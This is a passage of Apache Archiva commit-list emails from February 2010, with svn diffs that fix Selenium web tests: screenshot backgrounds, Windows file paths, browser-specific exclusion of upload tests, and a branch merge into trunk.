http://svn.apache.org/viewvc?rev=909372&view=rev Log: move to using a non-suite-xml as it's the only way to run the exclusion without making multiple copies Removed: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/config/ Modified: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/pom.xml Modified: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/pom.xml URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/pom.xml?rev=909372&r1=909371&r2=909372&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/pom.xml (original) +++ archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/pom.xml Fri Feb 12 11:57:15 2010 @@ -150,12 +150,11 @@ <configuration> <properties> <!-- - Use this instead of suiteXmlFiles so that we can add the exclusion, as it is only accepted if you use - the 'all command line parameters' mode. + Use this instead of suiteXmlFiles so that we can add the exclusion, as it is only accepted without suiteXmlFiles --> <property> - <name>suitename</name> - <value>${basedir}/src/test/testng/config/testng.xml</value> + <name>listener</name> + <value>org.apache.archiva.web.test.listener.CaptureScreenShotsListener</value> </property> <property> <name>excludegroups</name> From [email protected] Fri Feb 12 12:04:58 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 76853 invoked from network); 12 Feb 2010 12:04:57 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 12 Feb 2010 12:04:57 -0000 Received: (qmail 32399 invoked by uid 500); 12 Feb 2010 12:04:57 -0000 Delivered-To: [email protected] Received: (qmail 32342 invoked by uid 500); 12 Feb 2010 12:04:57 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.archiva.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 32333 invoked by uid 99); 12 Feb 2010 12:04:57 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 12 Feb 2010 12:04:57 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 12 Feb 2010 12:04:56 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id D244623889DE; Fri, 12 Feb 2010 12:04:36 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r909376 - /archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/listener/CaptureScreenShotsListener.java Date: Fri, 12 Feb 2010 12:04:36 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: brett Date: Fri Feb 12 12:04:36 2010 New Revision: 909376 URL: http://svn.apache.org/viewvc?rev=909376&view=rev Log: avoid black screenshots Modified: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/listener/CaptureScreenShotsListener.java Modified: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/listener/CaptureScreenShotsListener.java URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/listener/CaptureScreenShotsListener.java?rev=909376&r1=909375&r2=909376&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/listener/CaptureScreenShotsListener.java (original) +++ archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/listener/CaptureScreenShotsListener.java Fri Feb 12 12:04:36 2010 @@ -75,7 +75,7 @@ { selenium.windowMaximize(); File fileName = new File( targetPath, fileBaseName + ".png" ); - selenium.captureEntirePageScreenshot( fileName.getAbsolutePath(), "" ); + selenium.captureEntirePageScreenshot( fileName.getAbsolutePath(), "background=#FFFFFF" ); } catch ( RuntimeException e ) { From [email protected] Fri Feb 12 13:12:37 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 5016 invoked from network); 12 Feb 2010 13:12:37 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 12 Feb 2010 13:12:37 -0000 Received: (qmail 8309 invoked by uid 500); 12 Feb 2010 13:12:37 -0000 Delivered-To: [email protected] Received: (qmail 8257 invoked by uid 500); 12 Feb 2010 13:12:36 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.archiva.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 8248 invoked by uid 99); 12 Feb 2010 13:12:36 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 12 Feb 2010 13:12:36 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 12 Feb 2010 13:12:34 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id B57A923889DE; Fri, 12 Feb 2010 13:12:13 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r909393 - /archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractArtifactManagementTest.java Date: Fri, 12 Feb 2010 13:12:13 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: brett Date: Fri Feb 12 13:12:13 2010 New Revision: 909393 URL: http://svn.apache.org/viewvc?rev=909393&view=rev Log: make paths work on windows Modified: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractArtifactManagementTest.java Modified: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractArtifactManagementTest.java URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractArtifactManagementTest.java?rev=909393&r1=909392&r2=909393&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractArtifactManagementTest.java (original) +++ archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractArtifactManagementTest.java Fri Feb 12 13:12:13 2010 @@ -1,6 +1,6 @@ package org.apache.archiva.web.test.parent; -import java.io.File; +import java.io.*; public abstract class AbstractArtifactManagementTest extends AbstractArchivaTest @@ -32,9 +32,15 @@ public String getArtifactFilePath() { - File f = new File( "" ); - String artifactFilePath = f.getAbsolutePath(); - return artifactFilePath + "/src/test/it-resources/snapshots/org/apache/maven/archiva/web/test/foo-bar/1.0-SNAPSHOT/foo-bar-1.0-SNAPSHOT.jar" ; + File f = new File( "src/test/it-resources/snapshots/org/apache/maven/archiva/web/test/foo-bar/1.0-SNAPSHOT/foo-bar-1.0-SNAPSHOT.jar" ); + try + { + return f.getCanonicalPath(); + } + catch ( IOException e ) + { + return f.getAbsolutePath(); + } } public String getRepositoryId() From [email protected] Fri Feb 12 13:13:25 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 5216 invoked from network); 12 Feb 2010 13:13:24 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 12 Feb 2010 13:13:24 -0000 Received: (qmail 10411 invoked by uid 500); 12 Feb 2010 13:13:24 -0000 Delivered-To: [email protected] Received: (qmail 10354 invoked by uid 500); 12 Feb 2010 13:13:24 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.archiva.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 10345 invoked by uid 99); 12 Feb 2010 13:13:24 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 12 Feb 2010 13:13:24 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 12 Feb 2010 13:13:24 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 1BF3023889DE; Fri, 12 Feb 2010 13:13:04 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r909394 - /archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/ArtifactManagementTest.java Date: Fri, 12 Feb 2010 13:13:04 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: brett Date: Fri Feb 12 13:13:03 2010 New Revision: 909394 URL: http://svn.apache.org/viewvc?rev=909394&view=rev Log: fix adjusted value Modified: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/ArtifactManagementTest.java Modified: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/ArtifactManagementTest.java URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/ArtifactManagementTest.java?rev=909394&r1=909393&r2=909394&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/ArtifactManagementTest.java (original) +++ archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/ArtifactManagementTest.java Fri Feb 12 13:13:03 2010 @@ -87,7 +87,7 @@ public void testAddArtifactValidValues() { addArtifact( getGroupId() , "testAddArtifactValidValues", getVersion(), getPackaging() , getArtifactFilePath(), getRepositoryId() ); - assertTextPresent( "Artifact 'test:test:1.0' was successfully deployed to repository 'internal'" ); + assertTextPresent( "Artifact 'test:testAddArtifactValidValues:1.0' was successfully deployed to repository 'internal'" ); } //MRM-747 From [email protected] Fri Feb 12 13:36:32 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 12553 invoked from network); 12 Feb 2010 13:36:32 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 12 Feb 2010 13:36:32 -0000 Received: (qmail 33184 invoked by uid 500); 12 Feb 2010 13:36:32 -0000 Delivered-To: [email protected] Received: (qmail 33124 invoked by uid 500); 12 Feb 2010 13:36:32 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.archiva.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 33115 invoked by uid 99); 12 Feb 2010 13:36:32 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 12 Feb 2010 13:36:32 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 12 Feb 2010 13:36:30 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id E534723889DE; Fri, 12 Feb 2010 13:36:08 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r909402 - in /archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test: BrowseTest.java parent/AbstractArchivaTest.java parent/AbstractArtifactManagementTest.java Date: Fri, 12 Feb 2010 13:36:08 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: brett Date: Fri Feb 12 13:36:08 2010 New Revision: 909402 URL: http://svn.apache.org/viewvc?rev=909402&view=rev Log: make sure we always use a valid path in the upload form Modified: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/BrowseTest.java archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractArchivaTest.java archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractArtifactManagementTest.java Modified: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/BrowseTest.java URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/BrowseTest.java?rev=909402&r1=909401&r2=909402&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/BrowseTest.java (original) +++ archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/BrowseTest.java Fri Feb 12 13:36:08 2010 @@ -48,10 +48,6 @@ @Test(groups = {"requiresUpload"}) public void testCorrectRepositoryInBrowse() { - File artifact = - new File( getBasedir(), - "/src/test/it-resources/snapshots/org/apache/maven/archiva/web/test/foo-bar/1.0-SNAPSHOT/foo-bar-1.0-SNAPSHOT.jar" ); - String releasesRepo = getProperty( "RELEASES_REPOSITORY" ); // create releases repository first @@ -64,10 +60,10 @@ String snapshotsRepo = getProperty( "SNAPSHOTS_REPOSITORY" ); + String path = "src/test/it-resources/snapshots/org/apache/maven/archiva/web/test/foo-bar/1.0-SNAPSHOT/foo-bar-1.0-SNAPSHOT.jar"; // TODO: do this differently as uploading doesn't work on browsers other than *chrome (below as well) // upload a snapshot artifact to repository 'releases' - addArtifact( "archiva", "archiva-webapp", "1.0-SNAPSHOT", "jar", artifact.getPath(), - releasesRepo ); + addArtifact( "archiva", "archiva-webapp", "1.0-SNAPSHOT", "jar", path, releasesRepo ); assertTextPresent( "Artifact 'archiva:archiva-webapp:1.0-SNAPSHOT' was successfully deployed to repository '" + releasesRepo + "'" ); goToBrowsePage(); @@ -77,8 +73,7 @@ assertArtifactInfoPage( "1.0-SNAPSHOT/", releasesRepo, "archiva", "archiva-webapp", "1.0-SNAPSHOT", "jar" ); // upload a snapshot artifact to repository 'snapshots' - addArtifact( "continuum", "continuum-core", "1.0-SNAPSHOT", "jar", artifact.getPath(), - snapshotsRepo ); + addArtifact( "continuum", "continuum-core", "1.0-SNAPSHOT", "jar", path, snapshotsRepo ); assertTextPresent( "Artifact 'continuum:continuum-core:1.0-SNAPSHOT' was successfully deployed to repository '" + snapshotsRepo + "'" ); goToBrowsePage(); Modified: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractArchivaTest.java URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractArchivaTest.java?rev=909402&r1=909401&r2=909402&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractArchivaTest.java (original) +++ archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractArchivaTest.java Fri Feb 12 13:36:08 2010 @@ -1,6 +1,7 @@ package org.apache.archiva.web.test.parent; import java.io.File; +import java.io.IOException; import org.apache.archiva.web.test.XPathExpressionUtil; @@ -495,7 +496,25 @@ checkField( "generatePom" ); } - setFieldValue( "artifact", artifactFilePath ); + String path; + if ( artifactFilePath != null && artifactFilePath.trim().length() > 0 ) + { + File f = new File( artifactFilePath ); + try + { + path = f.getCanonicalPath(); + } + catch ( IOException e ) + { + path = f.getAbsolutePath(); + } + } + else + { + path = artifactFilePath; + } + + setFieldValue( "artifact", path ); setFieldValue( "repositoryId", repositoryId ); clickButtonWithValue( "Submit" ); Modified: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractArtifactManagementTest.java URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractArtifactManagementTest.java?rev=909402&r1=909401&r2=909402&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractArtifactManagementTest.java (original) +++ archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractArtifactManagementTest.java Fri Feb 12 13:36:08 2010 @@ -1,8 +1,6 @@ package org.apache.archiva.web.test.parent; -import java.io.*; - -public abstract class AbstractArtifactManagementTest +public abstract class AbstractArtifactManagementTest extends AbstractArchivaTest { @@ -32,15 +30,7 @@ public String getArtifactFilePath() { - File f = new File( "src/test/it-resources/snapshots/org/apache/maven/archiva/web/test/foo-bar/1.0-SNAPSHOT/foo-bar-1.0-SNAPSHOT.jar" ); - try - { - return f.getCanonicalPath(); - } - catch ( IOException e ) - { - return f.getAbsolutePath(); - } + return "src/test/it-resources/snapshots/org/apache/maven/archiva/web/test/foo-bar/1.0-SNAPSHOT/foo-bar-1.0-SNAPSHOT.jar"; } public String getRepositoryId() From [email protected] Fri Feb 12 13:47:51 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 17884 invoked from network); 12 Feb 2010 13:47:51 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 12 Feb 2010 13:47:51 -0000 Received: (qmail 52350 invoked by uid 500); 12 Feb 2010 13:47:51 -0000 Delivered-To: [email protected] Received: (qmail 52291 invoked by uid 500); 12 Feb 2010 13:47:51 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.archiva.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 52282 invoked by uid 99); 12 Feb 2010 13:47:51 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 12 Feb 2010 13:47:51 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 12 Feb 2010 13:47:50 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 04D8423889DE; Fri, 12 Feb 2010 13:47:30 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r909410 - in /archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test: ./ src/test/testng/config/ src/test/testng/org/apache/archiva/web/test/ src/test/testng/org/apache/archiva/web/test/listener/ src/test/testng/org/apache/archiva/we... Date: Fri, 12 Feb 2010 13:47:29 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: brett Date: Fri Feb 12 13:47:29 2010 New Revision: 909410 URL: http://svn.apache.org/viewvc?rev=909410&view=rev Log: merge -r909353:909402 from MRM-1025 branch, fixes for Selenium tests Removed: archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/config/ Modified: archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/ (props changed) archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/pom.xml archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/ArtifactManagementTest.java archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/AuditLogsReportTest.java archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/BrowseTest.java archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/listener/CaptureScreenShotsListener.java archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractArchivaTest.java archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractArtifactManagementTest.java Propchange: archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/ ------------------------------------------------------------------------------ --- svn:mergeinfo (added) +++ svn:mergeinfo Fri Feb 12 13:47:29 2010 @@ -0,0 +1,5 @@ +/archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test:882046,882457,884741,885313-885314,892686,909354-909403 +/archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp-test:686983-687034 +/archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp-test:723609-726925 +/archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp-test:699795-705848 +/archiva/tags/archiva-1.3/archiva-modules/archiva-web/archiva-webapp-test:898632 Modified: archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/pom.xml URL: http://svn.apache.org/viewvc/archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/pom.xml?rev=909410&r1=909409&r2=909410&view=diff ============================================================================== --- archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/pom.xml (original) +++ archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/pom.xml Fri Feb 12 13:47:29 2010 @@ -148,9 +148,20 @@ <groupId>org.apache.maven.plugins</groupId> <artifactId>maven-surefire-plugin</artifactId> <configuration> - <suiteXmlFiles> - <suiteXmlFile>src/test/testng/config/testng.xml</suiteXmlFile> - </suiteXmlFiles> + <properties> + <!-- + Use this instead of suiteXmlFiles so that we can add the exclusion, as it is only accepted without suiteXmlFiles + --> + <property> + <name>listener</name> + <value>org.apache.archiva.web.test.listener.CaptureScreenShotsListener</value> + </property> + <property> + <name>excludegroups</name> + <!-- Exclude on all browsers but Firefox, as it is the only one that Selenium supports file uploads on --> + <value>${excluded.groups}</value> + </property> + </properties> </configuration> <executions> <execution> @@ -165,7 +176,7 @@ <name>browser</name> <value>${selenium.browser}</value> </property> - <property> + <property> <name>baseUrl</name> <value>${baseUrl}</value> </property> @@ -404,6 +415,7 @@ </activation> <properties> <selenium.browser>*firefox</selenium.browser> + <excluded.groups /> </properties> </profile> <profile> @@ -416,6 +428,7 @@ </activation> <properties> <selenium.browser>*iexplore</selenium.browser> + <excluded.groups>requiresUpload</excluded.groups> </properties> </profile> <profile> @@ -428,6 +441,7 @@ </activation> <properties> <selenium.browser>*safari</selenium.browser> + <excluded.groups>requiresUpload</excluded.groups> </properties> </profile> <profile> @@ -440,6 +454,7 @@ </activation> <properties> <selenium.browser>*custom ${browserPath}</selenium.browser> + <excluded.groups>requiresUpload</excluded.groups> </properties> </profile> <profile> Modified: archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/ArtifactManagementTest.java URL: http://svn.apache.org/viewvc/archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/ArtifactManagementTest.java?rev=909410&r1=909409&r2=909410&view=diff ============================================================================== --- archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/ArtifactManagementTest.java (original) +++ archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/ArtifactManagementTest.java Fri Feb 12 13:47:29 2010 @@ -83,24 +83,22 @@ assertTextPresent( "Please add a file to upload." ); } - @Test( enabled = false ) + @Test(groups = "requiresUpload") public void testAddArtifactValidValues() { - // TODO: disable test on non *chrome browsers, there is no way to do file uploads (SEL-63) addArtifact( getGroupId() , "testAddArtifactValidValues", getVersion(), getPackaging() , getArtifactFilePath(), getRepositoryId() ); - assertTextPresent( "Artifact 'test:test:1.0' was successfully deployed to repository 'internal'" ); + assertTextPresent( "Artifact 'test:testAddArtifactValidValues:1.0' was successfully deployed to repository 'internal'" ); } //MRM-747 - @Test( enabled = false ) + @Test(groups = "requiresUpload") public void testAddArtifactBlockRedeployments() { - // TODO: disable test on non *chrome browsers, there is no way to do file uploads (SEL-63) addArtifact( getGroupId() , getArtifactId(), getVersion(), getPackaging() , getArtifactFilePath(), getRepositoryId() ); assertTextPresent( "Overwriting released artifacts in repository '" + getRepositoryId() + "' is not allowed." ); } - @Test( enabled = false ) + @Test(groups = "requiresUpload") public void testDeleteArtifact() { //prep Modified: archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/AuditLogsReportTest.java URL: http://svn.apache.org/viewvc/archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/AuditLogsReportTest.java?rev=909410&r1=909409&r2=909410&view=diff ============================================================================== --- archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/AuditLogsReportTest.java (original) +++ archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/AuditLogsReportTest.java Fri Feb 12 13:47:29 2010 @@ -68,8 +68,7 @@ } // TODO: add test for adding via WebDAV - // TODO: disable if not running on *chrome - @Test (dependsOnMethods = { "testAddArtifactValidValues" }, enabled = false ) + @Test (dependsOnMethods = { "testAddArtifactValidValues" }, groups = "requiresUpload") public void testViewAuditLogsDataFound() { goToAuditLogReports(); @@ -89,8 +88,7 @@ } // TODO: add test for adding via WebDAV - // TODO: disable if not running on *chrome - @Test (dependsOnMethods = { "testAddArtifactValidValues" }, enabled = false ) + @Test (dependsOnMethods = { "testAddArtifactValidValues" }, groups = "requiresUpload") public void testViewAuditLogsOnlyArtifactIdIsSpecified() { goToAuditLogReports(); @@ -110,8 +108,7 @@ } // TODO: add test for adding via WebDAV - // TODO: disable if not running on *chrome - @Test (dependsOnMethods = { "testAddArtifactValidValues" }, enabled = false ) + @Test (dependsOnMethods = { "testAddArtifactValidValues" }, groups = "requiresUpload") public void testViewAuditLogsForAllRepositories() { goToAuditLogReports(); @@ -129,7 +126,7 @@ assertTextPresent( "admin" ); } - @Test (dependsOnMethods = { "testAddArtifactValidValues", "testUserWithRepoManagerInternalRole" }, enabled = false ) + @Test (dependsOnMethods = { "testAddArtifactValidValues", "testUserWithRepoManagerInternalRole" }, groups = "requiresUpload") public void testViewAuditLogsViewAuditEventsForManageableRepositoriesOnly() { String groupId = getProperty( "SNAPSHOT_GROUPID" ); Modified: archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/BrowseTest.java URL: http://svn.apache.org/viewvc/archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/BrowseTest.java?rev=909410&r1=909409&r2=909410&view=diff ============================================================================== --- archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/BrowseTest.java (original) +++ archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/BrowseTest.java Fri Feb 12 13:47:29 2010 @@ -45,13 +45,9 @@ } // MRM-1278 - @Test( enabled = false ) + @Test(groups = {"requiresUpload"}) public void testCorrectRepositoryInBrowse() { - File artifact = - new File( getBasedir(), - "/src/test/it-resources/snapshots/org/apache/maven/archiva/web/test/foo-bar/1.0-SNAPSHOT/foo-bar-1.0-SNAPSHOT.jar" ); - String releasesRepo = getProperty( "RELEASES_REPOSITORY" ); // create releases repository first @@ -64,10 +60,10 @@ String snapshotsRepo = getProperty( "SNAPSHOTS_REPOSITORY" ); + String path = "src/test/it-resources/snapshots/org/apache/maven/archiva/web/test/foo-bar/1.0-SNAPSHOT/foo-bar-1.0-SNAPSHOT.jar"; // TODO: do this differently as uploading doesn't work on browsers other than *chrome (below as well) // upload a snapshot artifact to repository 'releases' - addArtifact( "archiva", "archiva-webapp", "1.0-SNAPSHOT", "jar", artifact.getPath(), - releasesRepo ); + addArtifact( "archiva", "archiva-webapp", "1.0-SNAPSHOT", "jar", path, releasesRepo ); assertTextPresent( "Artifact 'archiva:archiva-webapp:1.0-SNAPSHOT' was successfully 